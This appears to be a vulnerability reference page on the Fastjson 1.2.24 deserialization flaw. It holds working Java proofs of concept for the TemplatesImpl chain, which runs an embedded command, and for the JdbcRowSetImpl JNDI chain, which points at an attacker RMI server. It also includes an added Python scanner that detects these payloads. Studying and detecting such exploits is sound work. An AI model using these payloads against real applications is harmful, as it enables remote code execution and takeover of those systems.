Last updated on September 27, 2024
Affected versions
Fastjson 1.2.22 to 1.2.24
Exploitation requirements
JDK 8 and a Spring Boot project with the dependencies below. Fastjson is the vulnerable dependency; javassist is only used by the PoC to generate the translet bytecode and is not needed on the target.

```xml
<dependency>
    <groupId>org.javassist</groupId>
    <artifactId>javassist</artifactId>
    <version>3.28.0-GA</version>
</dependency>
<dependency>
    <groupId>com.alibaba</groupId>
    <artifactId>fastjson</artifactId>
    <version>1.2.24</version>
</dependency>
```
The application must parse attacker-controlled input with one of these forms:

```java
JSON.parseObject(payload, Object.class, Feature.SupportNonPublicField);
```

or

```java
JSON.parse(payload, Feature.SupportNonPublicField);
```

Feature.SupportNonPublicField is what makes the TemplatesImpl chain work: _bytecodes, _name and _tfactory are private fields without setters, and without this feature Fastjson will not populate them. The JdbcRowSetImpl chain further down uses public setters (setDataSourceName, setAutoCommit) and works with a plain JSON.parse().
Exploitation methods
TemplatesImpl chain
Call chain

```
JSON::parseObject -> DefaultJSONParser::parseObject -> JavaObjectDeserializer::deserialze -> DefaultJSONParser::parse -> DefaultJSONParser::parseObject -> JavaBeanDeserializer::deserialze -> JavaBeanDeserializer::parseField -> DefaultFieldDeserializer::parseField -> FieldDeserializer::setValue -> TemplatesImpl::getOutputProperties
```

From getOutputProperties() onward it is the usual TemplatesImpl chain: newTransformer() calls defineTransletClasses(), which defines the class carried in _bytecodes through a TransletClassLoader and instantiates it, so the static initializer of the generated class runs.
```java
package com.example.demo;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;
import org.apache.commons.codec.binary.Base64;

public class fastjsonTest {
    public static void main(String[] args) throws Exception {
        // Generate a class extending AbstractTranslet (TemplatesImpl only accepts
        // translets as the main class) whose static initializer runs the command.
        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
        CtClass cc = pool.makeClass("a");
        cc.setSuperclass(pool.get(AbstractTranslet.class.getName()));
        CtConstructor ctConstructor = cc.makeClassInitializer();
        ctConstructor.insertBefore("Runtime.getRuntime().exec(\"calc\");");
        byte[] code = cc.toBytecode();
        String code_base64 = Base64.encodeBase64String(code);

        final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";
        // _bytecodes, _name and _tfactory are private fields, hence
        // Feature.SupportNonPublicField below. _outputProperties maps to the public
        // getter getOutputProperties(), which Fastjson invokes and which starts the
        // chain. Fastjson accepts single-quoted strings as well as double-quoted ones.
        String payload = "{\"@type\":\"" + NASTY_CLASS + "\","
                + "\"_bytecodes\":[\"" + code_base64 + "\"],"
                + "'_name':'aaa',"
                + "'_tfactory':{ },"
                + "\"_outputProperties\":{ },"
                + "\"_version\":\"1.0\","
                + "\"allowedProtocols\":\"all\"}\n";

        ParserConfig config = new ParserConfig();
        Object obj = JSON.parseObject(payload, Object.class, config, Feature.SupportNonPublicField);
    }
}
```
https://www.cnblogs.com/akka1/p/16138460.html
JdbcRowSetImpl chain
This chain uses Fastjson deserialization to trigger a JNDI injection, and from there command execution. Fastjson calls setDataSourceName() with the attacker's URL and then setAutoCommit(true); setAutoCommit() calls connect(), which performs an InitialContext.lookup() on dataSourceName. The target therefore needs outbound network access to the attacker's RMI or LDAP server. Note that on JDK 8 remote class loading through the lookup is disabled by default from 8u121 for RMI and from 8u191 for LDAP, so on a patched JDK 8 the lookup alone no longer loads a remote class.

```java
package com.example.demo;

import com.alibaba.fastjson.JSON;

public class JdbcRowSetImplTest {
    public static void main(String[] args) throws Exception {
        // dataSourceName is looked up through JNDI when setAutoCommit(true) calls
        // connect(); point the rmi:// URL at an attacker-controlled server.
        String PoC = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\", "
                + "\"dataSourceName\":\"rmi://127.0.0.1:1099/RCE\", "
                + "\"autoCommit\":true}";
        JSON.parse(PoC);
    }
}
```
https://blog.csdn.net/weixin_43263451/article/details/125862793
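Both chains above are recognisable at the request-body layer before Fastjson ever parses them: a `@type` key naming a gadget class, a `_bytecodes` array, or a JNDI URL in a string value. The following scanner is an added example, not code from the original post or from the Fastjson project. It assumes only the two gadget classes this page discusses (the real list is much longer) and constructs its own sample bodies. It deliberately does not run a strict JSON parser, because Fastjson accepts single-quoted strings (the TemplatesImpl payload above mixes quote styles) and its lexer decodes `\uXXXX` and `\xXX` escapes inside strings, so a detector that requires well-formed JSON or matches raw bytes can be bypassed.

```python
import re

# Gadget classes discussed on this page. Assumption: this list is illustrative;
# a production rule would carry the full set of known Fastjson gadget types.
GADGET_CLASSES = {
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl":
        "TemplatesImpl: loads attacker bytecode from _bytecodes",
    "com.sun.rowset.JdbcRowSetImpl":
        "JdbcRowSetImpl: JNDI lookup of dataSourceName on autoCommit",
}

# Fastjson accepts both "key" and 'key', so match either quote style.
TYPE_KEY_RE = re.compile(r"""["']@type["']\s*:\s*["']([A-Za-z_$][\w.$]*)["']""")
BYTECODE_KEY_RE = re.compile(r"""["']_bytecodes["']\s*:""")
JNDI_VALUE_RE = re.compile(r"""["']((?:rmi|ldap|ldaps|iiop)://[^"']*)["']""", re.IGNORECASE)

_U_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")
_X_ESC = re.compile(r"\\x([0-9a-fA-F]{2})")


def normalize(body):
    """Decode \\uXXXX and \\xXX escapes the way Fastjson's lexer does, so that
    '\\u0040type' is seen as '@type'. Matching the raw bytes instead would let
    an escaped key slip past the rule."""
    body = _U_ESC.sub(lambda m: chr(int(m.group(1), 16)), body)
    return _X_ESC.sub(lambda m: chr(int(m.group(1), 16)), body)


def scan(body):
    """Return a list of findings for one request body; [] means nothing matched."""
    text = normalize(body)
    findings = []
    for m in TYPE_KEY_RE.finditer(text):
        cls = m.group(1)
        if cls in GADGET_CLASSES:
            findings.append("gadget @type " + cls + " (" + GADGET_CLASSES[cls] + ")")
        else:
            # Any @type is a request for polymorphic deserialization; log it
            # even when the class is not on the gadget list.
            findings.append("unknown @type " + cls)
    if BYTECODE_KEY_RE.search(text):
        findings.append("_bytecodes field present (embedded class bytes)")
    for m in JNDI_VALUE_RE.finditer(text):
        findings.append("JNDI URL in string value: " + m.group(1))
    return findings


# Constructed sample bodies (the base64 "AAAA" is a placeholder, not real bytecode).
SAMPLE_BENIGN = '{"name":"alice","age":3}'
SAMPLE_JDBC = ('{"@type":"com.sun.rowset.JdbcRowSetImpl",'
               ' "dataSourceName":"rmi://127.0.0.1:1099/RCE", "autoCommit":true}')
SAMPLE_TEMPLATES = ('{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",'
                    '"_bytecodes":["AAAA"],\'_name\':\'aaa\',\'_tfactory\':{ },'
                    '"_outputProperties":{ }}')
# Same JdbcRowSetImpl body with the key and class name hidden behind escapes.
SAMPLE_ESCAPED = ('{"\\u0040type":"com.sun.rowset.Jdbc\\x52owSetImpl",'
                  '"dataSourceName":"ldap://10.0.0.5/x","autoCommit":true}')

if __name__ == "__main__":
    for name, body in [("benign", SAMPLE_BENIGN), ("jdbc", SAMPLE_JDBC),
                       ("templates", SAMPLE_TEMPLATES), ("escaped", SAMPLE_ESCAPED)]:
        print(name, scan(body))
```

Flagging every `@type`, not just listed gadgets, is the useful default: an application that never expects polymorphic input has no legitimate reason to receive that key, and a new gadget class will not be on yesterday's list.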
Various Fastjson exploitation methods:
https://www.cnblogs.com/nice0e3/p/14776043.html